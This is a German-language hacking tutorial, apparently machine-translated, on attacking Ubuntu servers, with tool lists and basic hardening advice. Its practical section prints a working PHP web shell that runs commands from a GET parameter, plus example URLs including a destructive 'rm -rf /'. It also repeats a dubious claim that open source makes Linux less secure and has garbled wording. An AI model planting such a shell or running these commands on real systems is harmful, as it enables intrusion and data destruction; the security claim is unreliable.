Linux-Betriebssystem hacken: Hacken mit Ubuntu (Befehls-Tutorial)
Linux ist das am weitesten verbreitete Server-Betriebssystem, insbesondere fรผr Webserver. Es ist Open Source, d. h. jeder kann auf den Quellcode zugreifen. Dies macht es im Vergleich zu anderen Betriebssystemen weniger sicher, da Angreifer den Quellcode untersuchen kรถnnen, um Schwachstellen zu finden. Linux Bei โHackersโ geht es darum, diese Schwachstellen auszunutzen, um sich unbefugten Zugriff auf ein System zu verschaffen.
In diesem Artikel stellen wir Ihnen vor, was Linux ist und welche Sicherheitslรผcken es beim Hacken gibt Ubuntu und welche Gegenmaรnahmen Sie ergreifen kรถnnen.
Kurzer Hinweis zu Linux
Linux ist ein Open Source-Betriebssystem. Es gibt viele Distributionen von Linux-basierten Betriebssystemen wie Redhat, Fedora und Ubuntuusw. Im Gegensatz zu anderen Betriebssystemen ist Linux in Sachen Sicherheit weniger sicher. Dies liegt daran, dass der Quellcode frei verfรผgbar ist, sodass er im Vergleich zu anderen Betriebssystemen, die nicht Open Source sind, leicht auf Schwachstellen untersucht und ausgenutzt werden kann. Linux kann als Betriebssystem fรผr Server, Desktops, Tablets oder Mobilgerรคte verwendet werden.
Linux-Programme kรถnnen entweder รผber GUI oder Befehle bedient werden. Die Linux-Befehle fรผr Kali Linux Hacking sind effektiver und effizienter als die Verwendung der GUI. Aus diesem Grund ist es hilfreich, grundlegende Linux-Befehle zum Hacken zu kennen.
Sehen Sie sich diese Tutorials an https://www.guru99.com/unix-linux-tutorial.html wie man damit anfรคngt Kali Linux Hacks.
Linux-Hacking-Tools
- Nessusโ Dieses Tool kann verwendet werden fรผr Ubuntu Hacken, Konfigurationseinstellungen, Patches und Netzwerke scannen usw. finden Sie unter https://www.tenable.com/products/nessus
- NKarte. Mit diesem Tool kรถnnen Hosts รผberwacht werden, die auf dem Server ausgefรผhrt werden, sowie die von ihnen genutzten Dienste. Es kann auch zum Scannen nach Ports verwendet werden. Es ist zu finden unter https://nmap.org/
- SARA - SARA ist die Abkรผrzung fรผr Security Auditor's Research Assistant. Wie der Name schon sagt, kann dieses Tool verwendet werden, um Netzwerke auf Bedrohungen wie zu รผberprรผfen SQL Injection, XSS usw. finden Sie unter http://www-arc.com/sara/sara.html
Die obige Liste ist nicht vollstรคndig; Es gibt Ihnen eine Vorstellung von den verfรผgbaren Werkzeugen Ubuntu Hacken und Hacken von Linux-Systemen.
So verhindern Sie Linux-Hacks
Linux-Hacking nutzt die Schwachstellen des Betriebssystems aus. Eine Organisation kann die folgende Richtlinie anwenden, um sich vor solchen Angriffen zu schรผtzen.
- Patch-Managementโ Patches beheben Fehler, die Angreifer ausnutzen, um ein System zu kompromittieren. Eine gute Patch-Management-Richtlinie stellt sicher, dass Sie stรคndig relevante Patches auf Ihr System anwenden.
- Richtige Betriebssystemkonfigurationโ Andere Exploits nutzen die Schwรคchen in der Konfiguration des Servers aus. Inaktive Benutzernamen und Daemons sollten deaktiviert werden. Standardeinstellungen wie allgemeine Passwรถrter fรผr Anwendungen, Standardbenutzernamen und einige Portnummern sollten geรคndert werden.
- Intrusion Detection Systemโ Mit solchen Tools kรถnnen unbefugte Zugriffe auf das System erkannt werden. Einige Tools verfรผgen รผber die Fรคhigkeit, solche Angriffe zu erkennen und zu verhindern.
Hacking-Aktivitรคt: Hack a Ubuntu Linux-System mit PHP
In diesem praktischen Szenario lernen wir, wie man mit hackt Ubuntu und wir stellen Ihnen grundlegende Informationen zur Verwendung zur Verfรผgung PHP ein Linux kompromittieren. Wir werden kein Opfer ins Visier nehmen. Wenn Sie es ausprobieren mรถchten, kรถnnen Sie LAMPP auf Ihrem lokalen Computer installieren.
PHP verfรผgt รผber zwei Funktionen, mit denen Linux-Hacking-Befehle ausgefรผhrt werden kรถnnen. Es verfรผgt รผber die Funktionen exec() und shell_exec(). Die Funktion exec() gibt die letzte Zeile der Befehlsausgabe zurรผck, wรคhrend shell_exec() das gesamte Ergebnis des Befehls als String zurรผckgibt.
Zu Demonstrationszwecken nehmen wir an, dass es dem Angreifer gelingt, die folgende Datei auf einen Webserver hochzuladen.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
HIER,
Das obige Skript ruft den Befehl von der GET-Variablen namens cmd ab. Der Befehl wird mit shell_exec() ausgefรผhrt und die Ergebnisse werden im Browser zurรผckgegeben.
Der obige Code kann mithilfe der folgenden Methoden ausgenutzt werden: URL
http://localhost/cp/konsole.php?cmd=ls%20-l
HIER,
- โโฆkonsole.php?cmd=ls%20-lโweist der Variablen cmd den Wert ls โl zu.
Der Befehl in Ubuntu zum Hacken gegen den Server wird ausgefรผhrt als
shell_exec('ls -l') ;
Die Ausfรผhrung des obigen Codes auf einem Webserver fรผhrt zu Ergebnissen รคhnlich den folgenden.
Der obige Befehl zeigt einfach die Dateien im aktuellen Verzeichnis und die Berechtigungen an
Nehmen wir an, der Angreifer gibt den folgenden Befehl ein
rm -rf /
HIER,
- โrmโ entfernt die Dateien
- โrfโ bewirkt, dass der Befehl rm in einem rekursiven Modus ausgefรผhrt wird. Alle Ordner und Dateien lรถschen
- โ/โ weist den Befehl an, mit dem Lรถschen von Dateien aus dem Stammverzeichnis zu beginnen
Der Angriff URL wรผrde ungefรคhr so โโaussehen
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Zusammenfassung
- Linux ist ein beliebtes Betriebssystem fรผr Server, Desktops, Tablets und Mobilgerรคte.
- Linux ist Open Source und der Quellcode kann von jedem bezogen werden. Dies erleichtert das Erkennen von Schwachstellen. Es ist eines der besten Betriebssysteme fรผr Hacker.
- Grundlegende und Netzwerk-Hacking-Befehle in Ubuntu sind fรผr Linux-Hacker wertvoll.
- Schwachstellen sind Schwachstellen, die ausgenutzt werden kรถnnen, um ein System zu kompromittieren.
- Eine gute Sicherheit kann dazu beitragen, ein System vor der Kompromittierung durch einen Angreifer zu schรผtzen.

